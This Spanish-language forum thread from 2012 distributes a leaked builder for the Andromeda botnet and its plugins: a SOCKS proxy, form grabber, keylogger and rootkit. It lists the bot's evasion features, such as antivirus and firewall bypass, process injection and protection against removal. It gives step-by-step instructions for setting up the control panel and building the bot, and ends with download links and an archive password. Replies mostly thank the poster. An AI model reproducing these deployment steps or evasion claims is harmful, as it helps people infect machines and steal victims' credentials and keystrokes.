• Andromeda v2 + Todos sus plugins.

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #395939  por SuC
 19 Nov 2012, 22:42
Bueno, aquí os dejo este builder para la botnet Andromeda. En mi opinión, este builder no debería haber sido público, pero The Old Warrior al final decidió publicarlo.

Para los que no conocían esta bot, ahora explicaré más o menos su contenido.

También cabe decir que de las públicas, es de las más estables, y cuando digo pública me refiero que se vende en foros ..


Citaré parte del comentario del autor (Traducido del ruso):

La comunicación entre el bot y el panel es encriptada usando RC4.
En su instalación no se necesita privilegios de administrador, ni salta UAC.
El proceso esta protegido para evitar que se pueda eliminar el bot del sistema.
Bypassea los firewalls y se inyecta en un proceso de confianza.
Si se instala correctamente, el exe se elimina automaticamente.
Funciona en sistemas desde XP a 7 incluyendo x64.
El peso del archivo es aproximadamente unos 10kb.
Bypassea muchas proactivas de los antivirus.













Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.


Aquí una imagen del builder que creó The Old Warrior.




Como se configura (En inglés pero es lo mismo que todas las bots..):

. Upload /Panel files to androhost.com/andro
2. Create one mysql db.
3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
5. Open in your browser androhost.com/andro/index.php?act=install.
6. Login with default creditials: admin:admin
7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
8. Fill up all instalation page with your admin user and pasw, plus mysql details >> click 'Install'
9. After installation is done open in your browser androhost.com/andro/ifg.php
10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
11. Open Builder.exe > change host to: [ Debe registrarse para ver este enlace ] and build your bin.
12. For enable plugins just go in panel > menu > tasks > add task
Task type = Install plugin
Url= [ Debe registrarse para ver este enlace ]
Click 'Enabled' and add your task, do the same for each plugin.


Descarga:
[ Debe registrarse para ver este enlace ]
[ Debe registrarse para ver este enlace ]

Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.

Contraseña:
TrojanForge.com
 #395942  por jorge705
 19 Nov 2012, 22:50
wow muchas gracias por la botnet :D
 #395950  por kender
 19 Nov 2012, 23:45
gracias por la botnet pero la podrian subir a sendspace por q mediafire blokeo el link claroro si no es mucha molesti de todas formas muchisimas gracias
 #395952  por ukranow
 19 Nov 2012, 23:52
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
entonces según tu waahoo también se metería en problemas legales
por hacer ataques ddos
 #395956  por SuC
 20 Nov 2012, 00:06
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
Waahoo tendrá que ddosear todo Internet..
 #395960  por otroyomismo
 20 Nov 2012, 00:37
proactive escribió:Os vais a buscar problemas legales con el foro, publicando esta cosas para que niños la usen, ustedes vereis...ademas el autor waahoo a dicho que metera fuertes ataques ddos a tos foros donde sea publicado
Se han publicado bots de verdad y nunca habia visto este tipo de comentarios,no se quejaron los creadores de zeus,spyeye y se quejan por esta que ni se les acerca..jajaa
 #395975  por kender
 20 Nov 2012, 08:38
Muchisimas gracias men


 #395981  por SuC
 20 Nov 2012, 12:30
Descarga actualizada,el builder fue actualizado, también viene con un tool para poder ejecutar el bot en vm.
 #395987  por SuC
 20 Nov 2012, 14:13
marantz2004 escribió:Y para que sirve esto????
Busca en google información sobre botnets